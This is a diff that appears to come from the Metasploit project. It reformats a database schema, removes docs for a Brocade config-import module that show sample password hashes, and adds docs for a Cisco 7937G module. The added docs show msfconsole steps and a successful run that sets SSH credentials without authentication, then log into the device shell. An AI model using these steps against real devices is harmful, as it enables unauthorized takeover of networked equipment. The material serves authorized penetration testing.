+    t.text "data", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "jtr_format"
+    t.index "type, decode(md5(data), 'hex'::text)", name: "index_metasploit_credential_privates_on_type_and_data_sshkey", unique: true, where: "((type)::text = 'Metasploit::Credential::SSHKey'::text)"
+    t.index ["type", "data"], name: "index_metasploit_credential_privates_on_type_and_data", unique: true, where: "(NOT ((type)::text = 'Metasploit::Credential::SSHKey'::text))"
+  end
+
+  create_table "metasploit_credential_publics", id: :serial, force: :cascade do |t|
+    t.string "username", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "type", null: false
+    t.index ["username"], name: "index_metasploit_credential_publics_on_username", unique: true
+  end
+
+  create_table "metasploit_credential_realms", id: :serial, force: :cascade do |t|
+    t.string "key", null: false
+    t.string "value", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["key", "value"], name: "index_metasploit_credential_realms_on_key_and_value", unique: true
+  end
+
+  create_table "mod_refs", id: :serial, force: :cascade do |t|
    t.string "module", limit: 1024
-    t.string "mtype",  limit: 128
-    t.text   "ref"
+    t.string "mtype", limit: 128
+    t.text "ref"
  end

-  create_table "module_actions", force: :cascade do |t|
+  create_table "module_actions", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
-    t.text    "name"
+    t.text "name"
+    t.index ["detail_id"], name: "index_module_actions_on_detail_id"
  end

-  add_index "module_actions", ["detail_id"], name: "index_module_actions_on_detail_id", using: :btree
-
-  create_table "module_archs", force: :cascade do |t|
+  create_table "module_archs", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
-    t.text    "name"
+    t.text "name"
+    t.index ["detail_id"], name: "index_module_archs_on_detail_id"
  end

-  add_index "module_archs", ["detail_id"], name: "index_module_archs_on_detail_id", using: :btree
-
-  create_table "module_authors", force: :cascade do |t|
+  create_table "module_authors", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
-    t.text    "name"
-    t.text    "email"
+    t.text "name"
+    t.text "email"
+    t.index ["detail_id"], name: "index_module_authors_on_detail_id"
  end

-  add_index "module_authors", ["detail_id"], name: "index_module_authors_on_detail_id", using: :btree
-
-  create_table "module_details", force: :cascade do |t|
+  create_table "module_details", id: :serial, force: :cascade do |t|
    t.datetime "mtime"
-    t.text     "file"
-    t.string   "mtype"
-    t.text     "refname"
-    t.text     "fullname"
-    t.text     "name"
-    t.integer  "rank"
-    t.text     "description"
-    t.string   "license"
-    t.boolean  "privileged"
+    t.text "file"
+    t.string "mtype"
+    t.text "refname"
+    t.text "fullname"
+    t.text "name"
+    t.integer "rank"
+    t.text "description"
+    t.string "license"
+    t.boolean "privileged"
    t.datetime "disclosure_date"
-    t.integer  "default_target"
-    t.text     "default_action"
-    t.string   "stance"
-    t.boolean  "ready"
+    t.integer "default_target"
+    t.text "default_action"
+    t.string "stance"
+    t.boolean "ready"
+    t.index ["description"], name: "index_module_details_on_description"
+    t.index ["mtype"], name: "index_module_details_on_mtype"
+    t.index ["name"], name: "index_module_details_on_name"
+    t.index ["refname"], name: "index_module_details_on_refname"
  end

-  add_index "module_details", ["description"], name: "index_module_details_on_description", using: :btree
-  add_index "module_details", ["mtype"], name: "index_module_details_on_mtype", using: :btree
-  add_index "module_details", ["name"], name: "index_module_details_on_name", using: :btree
-  add_index "module_details", ["refname"], name: "index_module_details_on_refname", using: :btree
-
-  create_table "module_mixins", force: :cascade do |t|
+  create_table "module_mixins", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
-    t.text    "name"
+    t.text "name"
+    t.index ["detail_id"], name: "index_module_mixins_on_detail_id"
  end

-  add_index "module_mixins", ["detail_id"], name: "index_module_mixins_on_detail_id", using: :btree
-
-  create_table "module_platforms", force: :cascade do |t|
+  create_table "module_platforms", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
-    t.text    "name"
+    t.text "name"
+    t.index ["detail_id"], name: "index_module_platforms_on_detail_id"
  end

-  add_index "module_platforms", ["detail_id"], name: "index_module_platforms_on_detail_id", using: :btree
-
-  create_table "module_refs", force: :cascade do |t|
+  create_table "module_refs", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
-    t.text    "name"
+    t.text "name"
+    t.index ["detail_id"], name: "index_module_refs_on_detail_id"
+    t.index ["name"], name: "index_module_refs_on_name"
  end

-  add_index "module_refs", ["detail_id"], name: "index_module_refs_on_detail_id", using: :btree
-  add_index "module_refs", ["name"], name: "index_module_refs_on_name", using: :btree
-
-  create_table "module_runs", force: :cascade do |t|
+  create_table "module_runs", id: :serial, force: :cascade do |t|
    t.datetime "attempted_at"
-    t.text     "fail_detail"
-    t.string   "fail_reason"
-    t.text     "module_fullname"
-    t.integer  "port"
-    t.string   "proto"
-    t.integer  "session_id"
-    t.string   "status"
-    t.integer  "trackable_id"
-    t.string   "trackable_type"
-    t.integer  "user_id"
-    t.string   "username"
-    t.datetime "created_at",      null: false
-    t.datetime "updated_at",      null: false
+    t.text "fail_detail"
+    t.string "fail_reason"
+    t.text "module_fullname"
+    t.integer "port"
+    t.string "proto"
+    t.integer "session_id"
+    t.string "status"
+    t.integer "trackable_id"
+    t.string "trackable_type"
+    t.integer "user_id"
+    t.string "username"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.index ["session_id"], name: "index_module_runs_on_session_id"
+    t.index ["user_id"], name: "index_module_runs_on_user_id"
  end

-  add_index "module_runs", ["session_id"], name: "index_module_runs_on_session_id", using: :btree
-  add_index "module_runs", ["user_id"], name: "index_module_runs_on_user_id", using: :btree
-
-  create_table "module_targets", force: :cascade do |t|
+  create_table "module_targets", id: :serial, force: :cascade do |t|
    t.integer "detail_id"
    t.integer "index"
-    t.text    "name"
+    t.text "name"
+    t.index ["detail_id"], name: "index_module_targets_on_detail_id"
  end

-  add_index "module_targets", ["detail_id"], name: "index_module_targets_on_detail_id", using: :btree
-
-  create_table "nexpose_consoles", force: :cascade do |t|
-    t.datetime "created_at",                  null: false
-    t.datetime "updated_at",                  null: false
-    t.boolean  "enabled",      default: true
-    t.text     "owner"
-    t.text     "address"
-    t.integer  "port",         default: 3780
-    t.text     "username"
-    t.text     "password"
-    t.text     "status"
-    t.text     "version"
-    t.text     "cert"
-    t.binary   "cached_sites"
-    t.text     "name"
+  create_table "nexpose_consoles", id: :serial, force: :cascade do |t|
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.boolean "enabled", default: true
+    t.text "owner"
+    t.text "address"
+    t.integer "port", default: 3780
+    t.text "username"
+    t.text "password"
+    t.text "status"
+    t.text "version"
+    t.text "cert"
+    t.binary "cached_sites"
+    t.text "name"
  end

-  create_table "notes", force: :cascade do |t|
+  create_table "notes", id: :serial, force: :cascade do |t|
    t.datetime "created_at"
-    t.string   "ntype",        limit: 512
-    t.integer  "workspace_id",             default: 1, null: false
-    t.integer  "service_id"
-    t.integer  "host_id"
+    t.string "ntype", limit: 512
+    t.integer "workspace_id", default: 1, null: false
+    t.integer "service_id"
+    t.integer "host_id"
    t.datetime "updated_at"
-    t.boolean  "critical"
-    t.boolean  "seen"
-    t.text     "data"
-    t.integer  "vuln_id"
+    t.boolean "critical"
+    t.boolean "seen"
+    t.text "data"
+    t.integer "vuln_id"
+    t.index ["ntype"], name: "index_notes_on_ntype"
+    t.index ["vuln_id"], name: "index_notes_on_vuln_id"
  end

-  add_index "notes", ["ntype"], name: "index_notes_on_ntype", using: :btree
-  add_index "notes", ["vuln_id"], name: "index_notes_on_vuln_id", using: :btree
-
-  create_table "payloads", force: :cascade do |t|
-    t.string   "name"
-    t.string   "uuid"
-    t.integer  "uuid_mask"
-    t.integer  "timestamp"
-    t.string   "arch"
-    t.string   "platform"
-    t.string   "urls"
-    t.string   "description"
-    t.string   "raw_payload"
-    t.string   "raw_payload_hash"
-    t.string   "build_status"
-    t.string   "build_opts"
-    t.datetime "created_at",       null: false
-    t.datetime "updated_at",       null: false
+  create_table "payloads", id: :serial, force: :cascade do |t|
+    t.string "name"
+    t.string "uuid"
+    t.integer "uuid_mask"
+    t.integer "timestamp"
+    t.string "arch"
+    t.string "platform"
+    t.string "urls"
+    t.string "description"
+    t.string "raw_payload"
+    t.string "raw_payload_hash"
+    t.string "build_status"
+    t.string "build_opts"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
  end

-  create_table "profiles", force: :cascade do |t|
-    t.datetime "created_at",                null: false
-    t.datetime "updated_at",                null: false
-    t.boolean  "active",     default: true
-    t.text     "name"
-    t.text     "owner"
-    t.binary   "settings"
+  create_table "profiles", id: :serial, force: :cascade do |t|
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.boolean "active", default: true
+    t.text "name"
+    t.text "owner"
+    t.binary "settings"
  end

-  create_table "refs", force: :cascade do |t|
-    t.integer  "ref_id"
+  create_table "refs", id: :serial, force: :cascade do |t|
+    t.integer "ref_id"
    t.datetime "created_at"
-    t.string   "name",       limit: 512
+    t.string "name", limit: 512
    t.datetime "updated_at"
+    t.index ["name"], name: "index_refs_on_name"
  end

-  add_index "refs", ["name"], name: "index_refs_on_name", using: :btree
-
-  create_table "report_templates", force: :cascade do |t|
-    t.integer  "workspace_id",              default: 1, null: false
-    t.string   "created_by"
-    t.string   "path",         limit: 1024
-    t.text     "name"
-    t.datetime "created_at",                            null: false
-    t.datetime "updated_at",                            null: false
+  create_table "report_templates", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id", default: 1, null: false
+    t.string "created_by"
+    t.string "path", limit: 1024
+    t.text "name"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
  end

-  create_table "reports", force: :cascade do |t|
-    t.integer  "workspace_id",               default: 1, null: false
-    t.string   "created_by"
-    t.string   "rtype"
-    t.string   "path",          limit: 1024
-    t.text     "options"
-    t.datetime "created_at",                             null: false
-    t.datetime "updated_at",                             null: false
+  create_table "reports", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id", default: 1, null: false
+    t.string "created_by"
+    t.string "rtype"
+    t.string "path", limit: 1024
+    t.text "options"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
    t.datetime "downloaded_at"
-    t.integer  "task_id"
-    t.string   "name",          limit: 63
+    t.integer "task_id"
+    t.string "name", limit: 63
  end

-  create_table "routes", force: :cascade do |t|
+  create_table "routes", id: :serial, force: :cascade do |t|
    t.integer "session_id"
-    t.string  "subnet"
-    t.string  "netmask"
+    t.string "subnet"
+    t.string "netmask"
  end

-  create_table "services", force: :cascade do |t|
-    t.integer  "host_id"
+  create_table "services", id: :serial, force: :cascade do |t|
+    t.integer "host_id"
    t.datetime "created_at"
-    t.integer  "port",                  null: false
-    t.string   "proto",      limit: 16, null: false
-    t.string   "state"
-    t.string   "name"
+    t.integer "port", null: false
+    t.string "proto", limit: 16, null: false
+    t.string "state"
+    t.string "name"
    t.datetime "updated_at"
-    t.text     "info"
+    t.text "info"
+    t.index ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true
+    t.index ["name"], name: "index_services_on_name"
+    t.index ["port"], name: "index_services_on_port"
+    t.index ["proto"], name: "index_services_on_proto"
+    t.index ["state"], name: "index_services_on_state"
  end

-  add_index "services", ["host_id", "port", "proto"], name: "index_services_on_host_id_and_port_and_proto", unique: true, using: :btree
-  add_index "services", ["name"], name: "index_services_on_name", using: :btree
-  add_index "services", ["port"], name: "index_services_on_port", using: :btree
-  add_index "services", ["proto"], name: "index_services_on_proto", using: :btree
-  add_index "services", ["state"], name: "index_services_on_state", using: :btree
-
-  create_table "session_events", force: :cascade do |t|
-    t.integer  "session_id"
-    t.string   "etype"
-    t.binary   "command"
-    t.binary   "output"
-    t.string   "remote_path"
-    t.string   "local_path"
+  create_table "session_events", id: :serial, force: :cascade do |t|
+    t.integer "session_id"
+    t.string "etype"
+    t.binary "command"
+    t.binary "output"
+    t.string "remote_path"
+    t.string "local_path"
    t.datetime "created_at"
  end

-  create_table "sessions", force: :cascade do |t|
-    t.integer  "host_id"
-    t.string   "stype"
-    t.string   "via_exploit"
-    t.string   "via_payload"
-    t.string   "desc"
-    t.integer  "port"
-    t.string   "platform"
-    t.text     "datastore"
-    t.datetime "opened_at",     null: false
+  create_table "sessions", id: :serial, force: :cascade do |t|
+    t.integer "host_id"
+    t.string "stype"
+    t.string "via_exploit"
+    t.string "via_payload"
+    t.string "desc"
+    t.integer "port"
+    t.string "platform"
+    t.text "datastore"
+    t.datetime "opened_at", null: false
    t.datetime "closed_at"
-    t.string   "close_reason"
-    t.integer  "local_id"
+    t.string "close_reason"
+    t.integer "local_id"
    t.datetime "last_seen"
-    t.integer  "module_run_id"
+    t.integer "module_run_id"
+    t.index ["module_run_id"], name: "index_sessions_on_module_run_id"
  end

-  add_index "sessions", ["module_run_id"], name: "index_sessions_on_module_run_id", using: :btree
-
-  create_table "tags", force: :cascade do |t|
-    t.integer  "user_id"
-    t.string   "name",           limit: 1024
-    t.text     "desc"
-    t.boolean  "report_summary",              default: false, null: false
-    t.boolean  "report_detail",               default: false, null: false
-    t.boolean  "critical",                    default: false, null: false
-    t.datetime "created_at",                                  null: false
-    t.datetime "updated_at",                                  null: false
-  end
-
-  create_table "task_creds", force: :cascade do |t|
-    t.integer  "task_id",    null: false
-    t.integer  "cred_id",    null: false
+  create_table "tags", id: :serial, force: :cascade do |t|
+    t.integer "user_id"
+    t.string "name", limit: 1024
+    t.text "desc"
+    t.boolean "report_summary", default: false, null: false
+    t.boolean "report_detail", default: false, null: false
+    t.boolean "critical", default: false, null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

-  create_table "task_hosts", force: :cascade do |t|
-    t.integer  "task_id",    null: false
-    t.integer  "host_id",    null: false
+  create_table "task_creds", id: :serial, force: :cascade do |t|
+    t.integer "task_id", null: false
+    t.integer "cred_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

-  create_table "task_services", force: :cascade do |t|
-    t.integer  "task_id",    null: false
-    t.integer  "service_id", null: false
+  create_table "task_hosts", id: :serial, force: :cascade do |t|
+    t.integer "task_id", null: false
+    t.integer "host_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

-  create_table "task_sessions", force: :cascade do |t|
-    t.integer  "task_id",    null: false
-    t.integer  "session_id", null: false
+  create_table "task_services", id: :serial, force: :cascade do |t|
+    t.integer "task_id", null: false
+    t.integer "service_id", null: false
    t.datetime "created_at", null: false
    t.datetime "updated_at", null: false
  end

-  create_table "tasks", force: :cascade do |t|
-    t.integer  "workspace_id",              default: 1, null: false
-    t.string   "created_by"
-    t.string   "module"
+  create_table "task_sessions", id: :serial, force: :cascade do |t|
+    t.integer "task_id", null: false
+    t.integer "session_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+  end
+
+  create_table "tasks", id: :serial, force: :cascade do |t|
+    t.integer "workspace_id", default: 1, null: false
+    t.string "created_by"
+    t.string "module"
    t.datetime "completed_at"
-    t.string   "path",         limit: 1024
-    t.string   "info"
-    t.string   "description"
-    t.integer  "progress"
-    t.text     "options"
-    t.text     "error"
-    t.datetime "created_at",                            null: false
-    t.datetime "updated_at",                            null: false
-    t.text     "result"
-    t.string   "module_uuid",  limit: 8
-    t.binary   "settings"
+    t.string "path", limit: 1024
+    t.string "info"
+    t.string "description"
+    t.integer "progress"
+    t.text "options"
+    t.text "error"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.text "result"
+    t.string "module_uuid", limit: 8
+    t.binary "settings"
  end

-  create_table "users", force: :cascade do |t|
-    t.string   "username"
-    t.string   "crypted_password"
-    t.string   "password_salt"
-    t.string   "persistence_token"
-    t.datetime "created_at",                                      null: false
-    t.datetime "updated_at",                                      null: false
-    t.string   "fullname"
-    t.string   "email"
-    t.string   "phone"
-    t.string   "company"
-    t.string   "prefs",             limit: 524288
-    t.boolean  "admin",                            default: true, null: false
+  create_table "users", id: :serial, force: :cascade do |t|
+    t.string "username"
+    t.string "crypted_password"
+    t.string "password_salt"
+    t.string "persistence_token"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "fullname"
+    t.string "email"
+    t.string "phone"
+    t.string "company"
+    t.string "prefs", limit: 524288
+    t.boolean "admin", default: true, null: false
  end

-  create_table "vuln_attempts", force: :cascade do |t|
-    t.integer  "vuln_id"
+  create_table "vuln_attempts", id: :serial, force: :cascade do |t|
+    t.integer "vuln_id"
    t.datetime "attempted_at"
-    t.boolean  "exploited"
-    t.string   "fail_reason"
-    t.string   "username"
-    t.text     "module"
-    t.integer  "session_id"
-    t.integer  "loot_id"
-    t.text     "fail_detail"
+    t.boolean "exploited"
+    t.string "fail_reason"
+    t.string "username"
+    t.text "module"
+    t.integer "session_id"
+    t.integer "loot_id"
+    t.text "fail_detail"
  end

-  create_table "vuln_details", force: :cascade do |t|
-    t.integer  "vuln_id"
-    t.float    "cvss_score"
-    t.string   "cvss_vector"
-    t.string   "title"
-    t.text     "description"
-    t.text     "solution"
-    t.binary   "proof"
-    t.integer  "nx_console_id"
-    t.integer  "nx_device_id"
-    t.string   "nx_vuln_id"
-    t.float    "nx_severity"
-    t.float    "nx_pci_severity"
+  create_table "vuln_details", id: :serial, force: :cascade do |t|
+    t.integer "vuln_id"
+    t.float "cvss_score"
+    t.string "cvss_vector"
+    t.string "title"
+    t.text "description"
+    t.text "solution"
+    t.binary "proof"
+    t.integer "nx_console_id"
+    t.integer "nx_device_id"
+    t.string "nx_vuln_id"
+    t.float "nx_severity"
+    t.float "nx_pci_severity"
    t.datetime "nx_published"
    t.datetime "nx_added"
    t.datetime "nx_modified"
-    t.text     "nx_tags"
-    t.text     "nx_vuln_status"
-    t.text     "nx_proof_key"
-    t.string   "src"
-    t.integer  "nx_scan_id"
+    t.text "nx_tags"
+    t.text "nx_vuln_status"
+    t.text "nx_proof_key"
+    t.string "src"
+    t.integer "nx_scan_id"
    t.datetime "nx_vulnerable_since"
-    t.string   "nx_pci_compliance_status"
+    t.string "nx_pci_compliance_status"
  end

-  create_table "vulns", force: :cascade do |t|
-    t.integer  "host_id"
-    t.integer  "service_id"
+  create_table "vulns", id: :serial, force: :cascade do |t|
+    t.integer "host_id"
+    t.integer "service_id"
    t.datetime "created_at"
-    t.string   "name"
+    t.string "name"
    t.datetime "updated_at"
-    t.string   "info",               limit: 65536
+    t.string "info", limit: 65536
    t.datetime "exploited_at"
-    t.integer  "vuln_detail_count",                default: 0
-    t.integer  "vuln_attempt_count",               default: 0
-    t.integer  "origin_id"
-    t.string   "origin_type"
+    t.integer "vuln_detail_count", default: 0
+    t.integer "vuln_attempt_count", default: 0
+    t.integer "origin_id"
+    t.string "origin_type"
+    t.index ["name"], name: "index_vulns_on_name"
+    t.index ["origin_id"], name: "index_vulns_on_origin_id"
  end

-  add_index "vulns", ["name"], name: "index_vulns_on_name", using: :btree
-  add_index "vulns", ["origin_id"], name: "index_vulns_on_origin_id", using: :btree
-
-  create_table "vulns_refs", force: :cascade do |t|
+  create_table "vulns_refs", id: :serial, force: :cascade do |t|
    t.integer "ref_id"
    t.integer "vuln_id"
  end

-  create_table "web_forms", force: :cascade do |t|
-    t.integer  "web_site_id",              null: false
-    t.datetime "created_at",               null: false
-    t.datetime "updated_at",               null: false
-    t.text     "path"
-    t.string   "method",      limit: 1024
-    t.text     "params"
-    t.text     "query"
+  create_table "web_forms", id: :serial, force: :cascade do |t|
+    t.integer "web_site_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.text "path"
+    t.string "method", limit: 1024
+    t.text "params"
+    t.text "query"
+    t.index ["path"], name: "index_web_forms_on_path"
  end

-  add_index "web_forms", ["path"], name: "index_web_forms_on_path", using: :btree
-
-  create_table "web_pages", force: :cascade do |t|
-    t.integer  "web_site_id", null: false
-    t.datetime "created_at",  null: false
-    t.datetime "updated_at",  null: false
-    t.text     "path"
-    t.text     "query"
-    t.integer  "code",        null: false
-    t.text     "cookie"
-    t.text     "auth"
-    t.text     "ctype"
+  create_table "web_pages", id: :serial, force: :cascade do |t|
+    t.integer "web_site_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.text "path"
+    t.text "query"
+    t.integer "code", null: false
+    t.text "cookie"
+    t.text "auth"
+    t.text "ctype"
    t.datetime "mtime"
-    t.text     "location"
-    t.text     "headers"
-    t.binary   "body"
-    t.binary   "request"
+    t.text "location"
+    t.text "headers"
+    t.binary "body"
+    t.binary "request"
+    t.index ["path"], name: "index_web_pages_on_path"
+    t.index ["query"], name: "index_web_pages_on_query"
  end

-  add_index "web_pages", ["path"], name: "index_web_pages_on_path", using: :btree
-  add_index "web_pages", ["query"], name: "index_web_pages_on_query", using: :btree
-
-  create_table "web_sites", force: :cascade do |t|
-    t.integer  "service_id",              null: false
-    t.datetime "created_at",              null: false
-    t.datetime "updated_at",              null: false
-    t.string   "vhost",      limit: 2048
-    t.text     "comments"
-    t.text     "options"
+  create_table "web_sites", id: :serial, force: :cascade do |t|
+    t.integer "service_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "vhost", limit: 2048
+    t.text "comments"
+    t.text "options"
+    t.index ["comments"], name: "index_web_sites_on_comments"
+    t.index ["options"], name: "index_web_sites_on_options"
+    t.index ["vhost"], name: "index_web_sites_on_vhost"
  end

-  add_index "web_sites", ["comments"], name: "index_web_sites_on_comments", using: :btree
-  add_index "web_sites", ["options"], name: "index_web_sites_on_options", using: :btree
-  add_index "web_sites", ["vhost"], name: "index_web_sites_on_vhost", using: :btree
-
-  create_table "web_vulns", force: :cascade do |t|
-    t.integer  "web_site_id",              null: false
-    t.datetime "created_at",               null: false
-    t.datetime "updated_at",               null: false
-    t.text     "path",                     null: false
-    t.string   "method",      limit: 1024, null: false
-    t.text     "params"
-    t.text     "pname"
-    t.integer  "risk",                     null: false
-    t.string   "name",        limit: 1024, null: false
-    t.text     "query"
-    t.text     "category",                 null: false
-    t.integer  "confidence",               null: false
-    t.text     "description"
-    t.text     "blame"
-    t.binary   "request"
-    t.binary   "proof",                    null: false
-    t.string   "owner"
-    t.text     "payload"
+  create_table "web_vulns", id: :serial, force: :cascade do |t|
+    t.integer "web_site_id", null: false
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.text "path", null: false
+    t.string "method", limit: 1024, null: false
+    t.text "params"
+    t.text "pname"
+    t.integer "risk", null: false
+    t.string "name", limit: 1024, null: false
+    t.text "query"
+    t.text "category", null: false
+    t.integer "confidence", null: false
+    t.text "description"
+    t.text "blame"
+    t.binary "request"
+    t.binary "proof", null: false
+    t.string "owner"
+    t.text "payload"
+    t.index ["method"], name: "index_web_vulns_on_method"
+    t.index ["name"], name: "index_web_vulns_on_name"
+    t.index ["path"], name: "index_web_vulns_on_path"
  end

-  add_index "web_vulns", ["method"], name: "index_web_vulns_on_method", using: :btree
-  add_index "web_vulns", ["name"], name: "index_web_vulns_on_name", using: :btree
-  add_index "web_vulns", ["path"], name: "index_web_vulns_on_path", using: :btree
-
-  create_table "wmap_requests", force: :cascade do |t|
-    t.string   "host"
-    t.inet     "address"
-    t.integer  "port"
-    t.integer  "ssl"
-    t.string   "meth",       limit: 32
-    t.text     "path"
-    t.text     "headers"
-    t.text     "query"
-    t.text     "body"
-    t.string   "respcode",   limit: 16
-    t.text     "resphead"
-    t.text     "response"
+  create_table "wmap_requests", id: :serial, force: :cascade do |t|
+    t.string "host"
+    t.inet "address"
+    t.integer "port"
+    t.integer "ssl"
+    t.string "meth", limit: 32
+    t.text "path"
+    t.text "headers"
+    t.text "query"
+    t.text "body"
+    t.string "respcode", limit: 16
+    t.text "resphead"
+    t.text "response"
    t.datetime "created_at"
    t.datetime "updated_at"
  end

-  create_table "wmap_targets", force: :cascade do |t|
-    t.string   "host"
-    t.inet     "address"
-    t.integer  "port"
-    t.integer  "ssl"
-    t.integer  "selected"
+  create_table "wmap_targets", id: :serial, force: :cascade do |t|
+    t.string "host"
+    t.inet "address"
+    t.integer "port"
+    t.integer "ssl"
+    t.integer "selected"
    t.datetime "created_at"
    t.datetime "updated_at"
  end

  create_table "workspace_members", id: false, force: :cascade do |t|
    t.integer "workspace_id", null: false
-    t.integer "user_id",      null: false
+    t.integer "user_id", null: false
  end

-  create_table "workspaces", force: :cascade do |t|
-    t.string   "name"
-    t.datetime "created_at",                                      null: false
-    t.datetime "updated_at",                                      null: false
-    t.string   "boundary",           limit: 4096
-    t.string   "description",        limit: 4096
-    t.integer  "owner_id"
-    t.boolean  "limit_to_network",                default: false, null: false
-    t.boolean  "import_fingerprint",              default: false
+  create_table "workspaces", id: :serial, force: :cascade do |t|
+    t.string "name"
+    t.datetime "created_at", null: false
+    t.datetime "updated_at", null: false
+    t.string "boundary", limit: 4096
+    t.string "description", limit: 4096
+    t.integer "owner_id"
+    t.boolean "limit_to_network", default: false, null: false
+    t.boolean "import_fingerprint", default: false
  end

 end
@@ -1,50 +0,0 @@
-## General Notes
-
-This module imports a Brocade configuration file into the database.
-This is similar to `post/brocade/gather/enum_brocade` only access isn't required,
-and assumes you already have the file.
-
-Example files for import can be found on git, like [this](https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf).
-
-## Verification Steps
-
-1. Have a Brocade configuration file
-2. Start `msfconsole`
-3. `use auxiliary/admin/brocade/brocade_config`
-4. `set RHOST x.x.x.x`
-5. `set CONFIG /tmp/file.config`
-6. `run`
-
-## Options
-
-  **RHOST**
-
-  Needed for setting services and items to.  This is relatively arbitrary.
-
-  **CONFIG**
-
-  File path to the configuration file.
-
-## Scenarios
-
-```
-msf5 > wget https://raw.githubusercontent.com/h00die/MSF-Testing-Scripts/master/brocade_08.0.30hT311_ic_icx6430.conf -o /dev/null -O /tmp/brocade.conf
-msf5 > use auxiliary/admin/brocade/brocade_config
-msf5 auxiliary(admin/brocade/brocade_config) > set rhosts 127.0.0.1
-rhosts => 127.0.0.1
-msf5 auxiliary(admin/brocade/brocade_config) > set config /tmp/brocade.conf
-config => /tmp/brocade.conf
-msf5 auxiliary(admin/brocade/brocade_config) > run
-[*] Running module against 127.0.0.1
-
-[*] Importing config
-[+] password-display is enabled, hashes will be displayed in config
-[+] enable password hash $1$QP3H93Wm$uxYAs2HmAK0lQiP3ig5tm.
-[+] User brocade of type 8 found with password hash $1$f/uxhovU$dST5lNskZCPQe/5QijULi0.
-[+] ENCRYPTED SNMP community $MlVzZCFAbg== with permissions ro
-[+] ENCRYPTED SNMP community $U2kyXj1k with permissions rw
-[+] Config import successful
-[*] Auxiliary module execution completed
-```
-
-
@@ -0,0 +1,450 @@
+## Vulnerable Application
+
+  [Cisco 7937G](https://www.cisco.com/c/en/us/support/collaboration-endpoints/unified-ip-conference-station-7937g/model.html) Conference Station.
+  This module has been tested successfully against firmware versions SCCP-1-4-5-5 and SCCP-1-4-5-7.
+
+### Description
+
+  This module exploits a feature that should not be available via the web interface.
+  An unauthenticated user may set the credentials for SSH access to any username and
+  password combination desired, giving access to administrative functions through an SSH connection.
+
+## Verification Steps
+
+  1. Obtain a Cisco 7937G Conference Station.
+  2. Enable Web Access and SSH Access on the device.
+  3. Start msfconsole
+  4. Do: `use auxiliary/admin/http/cisco_7937g_ssh_privesc`
+  5. Do: `set RHOSTS 192.168.1.10`
+  6. Do: `set USER test`
+  7. Do: `set PASS test`
+  8. Do: `run`
+  9. The conference station's SSH service should now be configured with the supplied USER:PASS.
+
+## Options
+
+### PASS
+
+The desired password for setting SSH access
+
+### USER
+
+The desired username for setting SSH access
+
+## Scenarios
+
+### Cisco 7937G Running Firmware Version SCCP-1-4-5-7
+
+#### Successful Scenario
+
+```
+msf5 > use auxiliary/admin/http/cisco_7937g_ssh_privesc 
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set user test
+user => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set pass test
+pass => test
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > set rhosts 192.168.110.209
+rhosts => 192.168.110.209
+msf5 auxiliary(admin/http/cisco_7937g_ssh_privesc) > run
+
+[*] Running for 192.168.110.209...
+[*] 192.168.110.209 - Attempting to set SSH credentials.
+[*] 192.168.110.209 - SSH attack finished!
+[*] 192.168.110.209 - Try to login using the supplied credentials test:test
+[*] 192.168.110.209 - You must specify the key exchange when connecting or the device will be DoS'd!
+[*] 192.168.110.209 - ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf5 auxiliary(linux/ssh/cve_2020_16137) > exit
+user@ubuntu:~$ ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 test@192.168.110.209
+test@192.168.110.209's password:
+
+$>help
+
+
+Commands 1 to 21:
+help - Shows basic help for all commands.
+echo - Echoes all arguments (arbitrary parameters, up to 9)
+psosMaxShow - Show max number of psos objects created.
+psosFailuresShow - Show failures of psos api calls.
+clearNetStats - Clear statistics counters in Ethernet Driver.
+nicheShow - Show statistics of InterNiche stack.
+psosIntStackShow - Show information on interrupt stack.
+i - Display status of the specified process, or all running processes (Process_name (optional))
+checkStack - Checks the stack.
+reboot - Reboots the phone with an optional parameter.
+logl - Set the lowest log level which will be displayed (0-6)
+logs - Set the log level output for a given module ([module] [0-6])
+logsa - Set the log level output for all modules. ([0-6])
+logt - Set the log display type (0-2)
+logd - Dump the log, parameter is reverse order or not.
+logda - Print all available log modules and their current level.
+setRtRender - Set real time rendering parameters for the log.
+lfu - Send the logfiles to the provisioning server(no parameters).
+del - Delete specified file.
+cat - Concatanate specified files.
+
+Commands 21 to 41:
+copy - Copy a file, can be stdout.
